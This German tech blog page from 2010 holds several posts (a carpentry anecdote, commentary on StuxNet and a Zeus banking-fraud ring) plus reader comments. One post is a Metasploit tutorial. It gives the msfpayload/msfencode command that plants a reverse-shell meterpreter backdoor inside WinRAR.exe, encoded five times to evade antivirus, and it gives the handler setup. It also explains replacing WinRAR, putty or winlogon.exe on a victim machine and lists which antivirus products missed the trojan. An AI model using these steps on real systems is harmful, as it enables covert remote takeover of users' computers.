HomeArtikelDownloadsForum
PCFreunde.deArtikelAllgemeinH4ckb3rts BlogH4ckb3rts Blog: Hacker hacken Hacker!
Besucher online: 10
Hinweis
Diese Seite steht zum Verkauf.
Mehr Infos

Schnellsuche

Kategorien
Montag, 27. Dezember 2010 Seite 13/25
Tischlern: Tetris mal anders
H4ckb3rts Blog (Quelle: PCFreunde.de)
0tt0 ist fast fertig mit seinen Möbeln und ich musste ihm schon versprechen, demnächst Fotos seiner Werke online zu stellen. Jedenfalls saßen wir kürzlich gemeinsam in seinem zur Werkstatt degenerierten Zimmer und zelebrierten den Feierabend mit einem Bier. 0tt0 hatte allerdings tagsüber seine neuen Möbel angestrichen und die Dämpfe davon schienen sich irgendwie nicht mit dem Pils zu vertragen.

Folgendes gab er zum Besten: "Ist es nicht irre, wie diese ganzen Bretter aneinander passen? Erst sind sie so unansehnliche, längliche Dinger, aber wenn man Sie richtig zusammenfügt, ergeben sie perfekte Formen." An dieser Stelle musste ich husten.

0tt0 fuhr unbeirrt fort: "Tischlern ist wie Tetris... Nur, dass man sich seine Klötzchen selbst zurecht schneiden kann."
StuxNet: Das war erst der Anfang!
StuxNet: USB ist die Tür (Quelle: PCFreunde.de)
Die Bedeutung von StuxNet dürfte inzwischen jedem klar sein: Der Trojaner ist die erste bekannt gewordene Cyberkriegswaffe. Sämtliche Massenmedien haben ausführlich über sein Potential berichtet und über den enormen Aufwand, der in seine Herstellung geflossen sein muss. Auch die Spekulationen über seine Herkunft haben inzwischen einige Bildschirm- und Zeitungsseiten gefüllt. Die Liste der Verdächtigen wird im Moment von Israel und den USA angeführt, denn deren Geheimdienste hätten sowohl die Ressourcen als auch ein Interesse daran, das iranische Atomprogramm zu bremsen.

Es waren aber vermutlich nicht die iranischen Atomkraftwerke selbst, die StuxNet sabotieren sollte, sondern Uran-Anreicherungsanlagen. In Atomkraftwerken hätte der Virus vergleichsweise wenig Schaden anrichten können, weil dort alle automatisierten Systeme Backups haben. In den Anreicherungsanlagen hingegen, die in Gaszentrifugen Uran aufbereiten, hätten kleinste Veränderungen an der Steuerungssoftware eine vernichtende Wirkung: Die fertiggestellten Brennstäbe wären fehlerhaft und dank der Tarnkappenfunktionalität von StuxNet würde es Monate dauern, bis die Ursache für die Fehlfunktionen gefunden wäre. Es ist gar nicht so unwahrscheinlich, dass StuxNet diesen Zweck auch tatsächlich erfüllt hat.

Es stellt sich also die Frage, wie StuxNet und seine unvermeidlichen Nachfolger in die zukünftige Sicherheitslandschaft einzuordnen sind. Müssen die Armeen der Welt jetzt Cyberkasernen unterhalten? Soll die Polizei IT-Experten anheuern, die Wasserwerke und Stromnetze schützen? Für NATO-Generalsekretär Anders Rasmussen ist das längst nicht genug. Er will bei zukünftigen Cyberattacken nicht kleckern, sondern klotzen und gleich den Bündnisfall ausrufen. Bisher ist das zwar nur einmal geschehen, und zwar in der Folge des 11. Septembers 2001. Aber wenn es nach Rasmussen geht, wird in Zukunft mit realen Kanonen auf virtuelle Spatzen geschossen.

Man darf allerdings gespannt sein, was die NATO-Führung als "Cyber-Angriff" einstufen will. Denn wenn die Herren Generäle schon bei jedem Portscan die Truppen in Marsch setzen, kommt auf die NATO-Soldaten einiges an Rennerei zu...

Realistisch betrachtet ist das Ganze wahrscheinlich nur eine weitere Episode der unendlichen Geschichte mit dem Titel: "Politiker – Arm an Sachkunde, reich an großen Worten".
Malware-Kriminelle: 70 Millionen Dollar erbeutet!
Dutzende US-amerikanische Unternehmen sind über die letzten Monate von einer Gruppe ukrainischer Cyber-Krimineller ausgenommen worden. Die Online-Gauner haben insgesamt über 70 Millionen Dollar erbeutet und mit Hilfe von Geldboten außer Landes geschafft. Es hat ihnen aber nichts genützt: Letzte Woche wurden die fünf Hauptverdächtigen in der Ukraine festgenommen.

Damals wie heute: Zeus schleudert seine Speere (Quelle: PCFreunde.de)
Dabei war ihre Masche gar nicht schlecht: Sie haben den Lieblingstrojaner aller Malware-Verbreiter, Zeus, in eine eigene Fassung umgeschrieben und mittels persönlicher E-Mail-Nachrichten versendet. Empfänger dieser Mails waren Mitarbeiter der Zielfirmen, die Zugriff auf die Konten hatten, also hauptsächlich Buchhalter und Geschäftsführer. Wenn die vom nunmehr infizierten PC aus das nächste Mal eine Überweisung tätigen wollten, wurden ihre Zugangsdaten abgefangen und die Konten ganz schnell leer geräumt.

Das Firmengeld wurde anschließend weitergeleitet auf Konten, die von ukrainischen Austauschstudenten mit gefälschten Papieren eröffnet worden waren. Diese "Studenten" waren immer nur für kurze Zeit in den USA, hoben das Geld, das auf ihren Konten ankam, sofort ab und machten sich dann auf den Heimweg. Für ihre Dienste als Geldbote durften sie 8 bis 10 % der geschmuggelten Summe behalten. Laut FBI waren insgesamt über 3500 Geldboten an dieser Operation beteiligt. Jeder von ihnen schmuggelte etwa 20.000 Dollar, konnte also mit einem Gewinn von 2.000 Dollar rechnen – dafür, dass er eine Reise in die USA machte.

Das Ungewöhnliche an diesem Verbrecherring ist eigentlich nur, dass die ukrainischen Behörden in hochgenommen haben. Schon seit Jahren laufen Online-Betrügereien auf diese Weise ab und fast immer wird das Geld nach Osteuropa geschafft. Sollte der bisher so sichere Hafen Ukraine etwa demnächst trocken gelegt werden? Dann müssten sich aber so einige Kunden bei den einschlägigen One-Click-Hostern eine neue Basis für ihre dunklen Machenschaften suchen.
Metasploit: Matrjoschka-Dateien
Wenn zwei Dinge zusammen kommen, hänge ich vor meinem Monitor fest wie hinbetoniert: Ich muss Zeit haben und ich muss irgendwas genau wissen wollen. Das ist mal wieder passiert. Seit ein paar Monaten lassen sich mit msfencode Windows-exe-Dateien mit Metasploit-Exploits kombinieren, sodass die ursprüngliche Exe funktional bleibt. Man kann also eine Datei so präparieren, dass der ausführende Nutzer sie normal nutzen kann, gleichzeitig aber eine zusätzliche, eingeschleuste Funktion ausgeführt wird, die beispielsweise eine meterpreter-Hintertür öffnet.

Für die folgenden Ausführungen gehe ich davon aus, dass der geneigte Leser ein paar grundlegende Kenntnisse der Linux-Konsole und Zugriff auf einige virtuelle Maschinen hat, darunter ein BackTrack-4-Linux. Letzteres lässt sich beispielsweise mit dieser Anleitung ganz leicht bewerkstelligen.

Zum Test: Ich wollte also ausprobieren, mit welchen häufig verwendeten Windows-Dateien das Matrjoschka-Prinzip funktioniert. Erst mal habe ich mir also ein paar Exe-Files ausgesucht, die sich auf allen oder zumindest möglichst vielen Windows-Rechnern finden. Hier ist meine Opferliste:
  • taskmgr.exe – Der Windows-Taskmanager
  • calc.exe – Der Taschenrechner
  • WinRAR.exe – Häufig genutzter Packer
  • putty.exe – SSH-Client
  • wmplayer.exe – Der Windows Media Player
  • vlc.exe – Der VLC-Player
  • winlogon.exe – Wird bei jedem User-Login aufgerufen.
  • TrueCrypt.exe – Verschlüsselungstool
  • iexplore.exe – Der Internet Explorer
  • firefox.exe – Der Firefox
  • chrome.exe – Google Chrome
Gleich zu Beginn des Tests sind alle drei Browser und TrueCrypt ausgeschieden. Sie verwenden gepackte exe-Dateien, in die sich keine zusätzliche Funktionalität einbetten lässt. Auch der VLC Player lässt seine exe-Datei nicht modifizieren.

Die anderen Kandidaten jedoch ließen sich ein meterpreter-Payload unterjubeln und verrichteten danach weiterhin ihren Dienst. Beispielsweise im Fall von WinRAR ist dazu folgendermaßen vorzugehen:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.196 R | msfencode -t exe -k -e x86/shikata_ga_nai -c 5 -x ~/templates/WinRAR.exe -o ~/results/WinRAR_cooked.exe
Die im Heimatverzeichnis unter "templates" wartende WinRAR.exe wird mit einem zurückverbindenden Meterpreter ausgestattet, fünffach verschlüsselt, um Anti-Virus-Programmen zu entgehen und dann im Verzeichnis "results" als "WinRAR_cooked.exe" abgelegt. Analog geht man bei allen anderen Dateien vor. Die nach LHOST folgende IP-Adresse ist natürlich an die eigenen Gegebenheiten anzupassen.

Sind alle exe-Vorlagen mit Hintertürchen versehen, können die Ergebnisse getestet werden. Doch das ist nicht so einfach: Man kann den Task-Manager, die winlogon.exe und selbst den Taschenrechner nicht so ohne weiteres auf dem Opferrechner austauschen. Veränderungen im Ordner C:\Windows\System32, dem Heimatverzeichnis von taskmgr.exe und calc.exe, dürfen nur vom System vorgenommen werden. Auch der Ordner "C:\Programme\Windows Media Player\" wird vom Trusted Installer geschützt und darum lässt sich auch dort nicht einfach so eine Datei einschleusen. WinRAR ist der einzige Kandidat, der ungeschützt im Programmverzeichnis liegt. Als angemeldeter Windows-Nutzer kann man also die WinRAR.exe unter C:\Programme\WinRAR umbenennen, die präparierte WinRAR_cooked.exe in den Ordner kopieren und diese nun WinRAR.exe nennen. Wenn diese jetzt gestartet wird, verbindet sich der Opferrechner tatsächlich mit dem wartenden Exploit-Handler unter 192.168.0.196. Gestartet wurde dieser wie immer per:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.196
exploit
Noch einfacher funktioniert der Hintertüreinbau im Fall von putty. Da der SSH-Client auch in der "saubereren" Variante nur eine einzelne exe-Datei darstellt, muss er nicht einmal installiert werden. Wird die Datei durch die Matrjoschka-Version ausgestauscht, erfüllt sie weiter ihren Zweck, liefert dem Angreifer aber zusätzlich seinen verborgenen Zugang zum System.

Schwieriger wird es bei calc.exe, taskmgr.exe, winlogon.exe und wmplayer.exe. Die ersten drei liegen im System32-Ordner und da kann man sie nur austauschen, wenn man physischen Zugriff auf den Opferrechner hat. Dann kann man nämlich eine Live-CD booten, von dieser auf die Windows-Festplatte zugreifen und so die Ersetzungen vornehmen. Bei der wmplayer.exe ist der Ablauf ähnlich, nur liegt sie im Programmverzeichnis unter "Windows Media Player".

Der präparierte Windows-Rechner liefert dann auch brav seine meterpreter-Shell an den Handler aus. Je nachdem, welche Datei(en) ersetzt wurden, wird bei jedem Login, bei der Wiedergabe einer Mediendatei, beim Aufruf des Taschenrechners oder beim Ausführen des Task-Managers eine Verbindung zum Angreifer hergestellt, die ihm Zugriff auf den Rechner gewährt. Besonders lohnend wäre für den Angreifer die winlogon.exe, denn durch sie bekommt er Zugriff als SYSTEM, was ihm die maximal möglichen Rechte verschafft.

Ergebnis der Prüfung bei VirusTotal (Quelle: virustotal.com)
Bisher hört sich das vielleicht alles ziemlich bedrohlich an, denn schließlich funktioniert der Rechner des Opfers weiter, aber holt unbemerkt einen Angreifer herein. Doch muss der sicherheitsaffine Windows-Nutzer nicht verzagen, denn gegen solche Unanständigkeiten, wie ich sie hier beschreibe, sind gleich mehrere Kräuter gewachsen: Anti-Virus-Programme. Die besseren unter diesen erkennen präparierte exe-Dateien als solche und warnen den User. Allerdings sind das nicht unbedingt die Großen der Branche: In meinen noch recht oberflächlichen Tests habe ich schon eine WinRAR-Version mit Hintertür geschaffen, die unter anderem McAfee, Symantec, Kaspersky, Microsoft und ClamAV für harmlos halten. Empfehlenswert wären in diesem Fall avast! und AntiVir, denn beide warnen wenigstens, wenn auch fehlerhaft.

Fazit: Wieder was dazugelernt. Mit ein bisschen Trickserei lassen sich auf einem Windows-Rechner ziemlich hinterhältige Dateien platzieren, die von vielen AV-Tools nicht erkannt werden. WinRAR ging als Sieger aus meinen persönlichen Tests hervor, weil sich die zugehörige exe-Datei vom angemeldeten User austauschen lässt. Das erleichtert die Dinge doch ganz beachtlich.
ZurückWeiter
© Copyright PCFreunde.de
Inhaltsverzeichnis
Kommentare
Schreib uns deine Meinung zu diesem Artikel - einfach registrieren und los!
Kommentar schreiben
 
BgF
12.07.2010 22:42
Also, wieder mal ein super Artikel :wink:
Zum Thema Apple, lässt sich nur sagen..Apple+Software Entwicklung=Fail!
Leider hört man einfach nicht viel von diesen Problemen und dadurch der irrglaube entsteht, dass zum Beispiel Mac OS X ein so sicheres OS wäre :roll:
Ich finde es jedenfalls toll, das man auch noch kritische Stimmen zu diesem Konzern und seine Produkte hört.
Wobei ich die Produkte von Apple nicht mal schlecht finde, vorallem das Apple Ipod touch, ausser natürlich das sie vollkommen überteuert sind.
Aber alleine schon wegen ihrer unglaublischen arroganten, ja schon fast Sektenartige, Firmenpolitik gehört dieser Konzern einfach nur Boykottiert.....
 
ATI Gott
13.07.2010 17:40
Für mich zu viel Apple in diesem Artikel :evil:
Es gibt noch andere Dinge, über die man sich beschweren kann :mrgreen:
 
TK814
17.07.2010 17:42
Was ein Glück das die Hacker noch Stolz gehabt haben.
 
TheFreak
03.08.2010 14:30
Wer bracht schon GSM, Edge, UMTS oder Wimax, wenn man LTE hat :mrgreen:

:arrow: Long
:arrow: Term
:arrow: Evolution
 
-luke-
10.08.2010 00:38
Oh man ja. Heuschnupfen, der endlose Fluss. So gehts mir auch, von Anfang August bis Ende September ständig ne verstopfte Nase. Da helfen auch keine AntiHistaminika. Also h4ckb3rt, du leidest nicht allein! Durchhalten lautet die Devise.
 
-h0m3r-
24.08.2010 12:00
Zitat:
Egal, Kernel-Update ist angesagt!


apt-get upgrade
und
pacman -Syu

Erledigt! :mrgreen:
 
tho.moore
24.08.2010 12:16
*klugschei*ermodus an*: :mrgreen:

Zitat:
apt-get upgrade

Da fehlt ein apt-get update, sonst hat der Befehl wenig Sinn.

*klugschei*ermodus aus* :mrgreen:
 
-h0m3r-
24.08.2010 16:46
Ja du hast recht. :wink:
Ich wusste, dass das kommt, war aber zu faul zum editieren. :mrgreen: :mrgreen: :mrgreen:
 
TheFreak
01.09.2010 15:38
-h0m3r- hat folgendes geschrieben:
Ja du hast recht. :wink:
Ich wusste, dass das kommt, war aber zu faul zum editieren. :mrgreen: :mrgreen: :mrgreen:


Fast wie Homer, nur das der es gar nicht erst bemerkt hätte :mrgreen:
 
thepower
14.11.2010 12:51
Apple? Das ist doch die Firma, die bis vor kurzem schlechte Telefone über die Telekom verkauft hat? :idea: Jetzt hat auch Mr. Gates gemerkt, daß man mit schlechter Software im Telefonmarkt Schrott verkaufen kann... :mrgreen:
 
TheFreak
14.11.2010 22:26
thepower hat folgendes geschrieben:
Apple? Das ist doch die Firma, die bis vor kurzem schlechte Telefone über die Telekom verkauft hat? :idea: Jetzt hat auch Mr. Gates gemerkt, daß man mit schlechter Software im Telefonmarkt Schrott verkaufen kann... :mrgreen:


Wenn Microsoft schon nicht ein Betriebssystem auf einem PC einigermaßen zum Laufen bringt, wie sollten die dann bei einem Handy hinbekommen? Mal ernsthaft, Benutzeroberfläche: Scheiße und Apos fehlen (App Store).
Da hat sich Apple echt was geiles gebastelt. Andere entwickeln für ihr Produkt Programme und Apple bekommt auch noch was ab.

Also deswegen über Apple herzuziehen kann ich nicht nachvollziehen. Die Benutzeroberfläche ist echt geil (alles andre eingeschlossen ;) )

Gruß Dani
 
thepower
15.11.2010 11:01
Nur weil etwas Geld bringt ist es nicht gut! Microsoft OS? Das ist zuviel verlangt. Aber wozu BSD oder linux gibt's günstig und ist besser, meiner unmaßgeblichen Meinung nach. Bei apple heisst das glaub ich Mac OS oder so... damit mag sich rumplagen wer Grafiken mag... Dani, ich persönlich habe mir etwas mehr versprochen von einem Telefon was "so teuer" ist und bin sehr enttäuscht von dem Spiel was Apple treibt. Auch empfehle ich die finger von dem neuen Ding, den Namen hab ich mir schon gar nicht gemerkt.... 500 € für'n netbook? Solche Spitzbuben kannst nur strafen, wenn du sie wirtschaftlich nicht unterstützt, solange Daimler noch Autos verkaufen kann wird kein wirklich gutes mehr entwickelt...
lg
karl
 
TheFreak
15.11.2010 16:48
thepower: Behindert dich am iPhone 4 etwa die kleinen Empfangsprobleme? Wenn ja, machst du wirklich was falsch :wink:

Aber nun BTT!
 
BgF
06.12.2010 23:35
Selbst wenn es die US-Regierung schafft Wikileaks aus dem Internet zu verbannen, wird es halt in Wikileaks X2 oder so etwas unbenannt...
Wann verstehen die Politker endlich, dass man so etwas nicht mit Zensur verhindert. Selbst China mit ihrer "großen Firewall" haben immer wieder Lücken und deren Zensur ist ebenfalls alles andere als Perfekt.
Aber es ist lustig immer wieder anzusehen wie sie es versuchen :roll:
Der Haftbefehl wurde für Assange , in UK, ausgestellt.> Klick

Bin gespannt was daraus wird....
 
BgF
13.12.2010 21:09
Ein wieder schön zu lesender Beitrag!

Amazon war gestern ebenfalls down, doch anscheinend haben sie das selbst hinbekommen.
Die neue Vorgabe von Anon. könnte schon etwas bewirken, dass sie auch mehr machen als am Computer zu sitzen, sieht man schön am Project Chanology ;)
Was aber dem Fass die Krone ins Gesicht schlägt , ist die Berichterstattung der großen Medieninstituten...Aber mal erlich, wer hat was anderes erwartet?
 
BgF
20.12.2010 22:01
Zitat:
metaphorisch gesprochen – der Schlüssel im Schloss drehte?


:lol:

Ja, diese Sache um Assange wird aber irgendwie schon wieder langweilig, jedenfalls wenn es nach den großen Medien geht.

Kondom extra zum platzen gebracht? Wie soll denn das gehen? Ich fang besser garnicht erst damit an, was das für ein Sinn ergeben sollte..
Zur 2. Frau, sie hat geschlafen, ist aufgewacht und hat gemerkt das er gerade[....] und sie hat sich nicht Beschwerd? Wo ist die Straftat?

Naja man muss kein IQ von 103 haben um zu merken, dass das nur ein Weg zur Auslieferung von Assange in die USA sein soll.

PS: Ich kann doch nicht der einzige sein, der diesen Blog Montag liesst :wink: ?
 
nikasio14
20.12.2010 22:59
"BgF" hat folgendes geschrieben:
Ich kann doch nicht der einzige sein, der diesen Blog Montag liesst ?


Nein, bist du nicht =) *Großer_Fan-Von-H4ckb3rt-Sei*

diese Sache mit Assange wird immer skurriler....
Hinaus! -mit der Pressefreiheit- Hinaus! China wir kommen! :twisted:

Das Steamlock-Knock-Knock-Schloss ist aber echt mal der Hammer =) so was fehlt mir noch! ;-) 8)
 
TheFreak
22.12.2010 20:14
Also wenn Assange wirklich diese Straftat begangen hat, dann wäre er bestimmt schon längst in den USA, nur ich denke die Behörden von England trauen der Geschichte auch nicht so ganz, oder wissen schon längst, das das nur ein Vorwand ist...
 
geilo
22.12.2010 21:56
Ach die suchen irgentwas damit sie den hinter Gittern stecken können
Assange hat nicht wirlich gutes über die USA gesagt
 
TheFreak
22.12.2010 23:43
geilo hat folgendes geschrieben:
Ach die suchen irgentwas damit sie den hinter Gittern stecken können
Assange hat nicht wirlich gutes über die USA gesagt


Schon klar, die Wahrheit schadet der USA immens :roll:
 
Alle BeiträgeKommentar schreiben
Community Login
eMail:
Passwort:
Auto-Login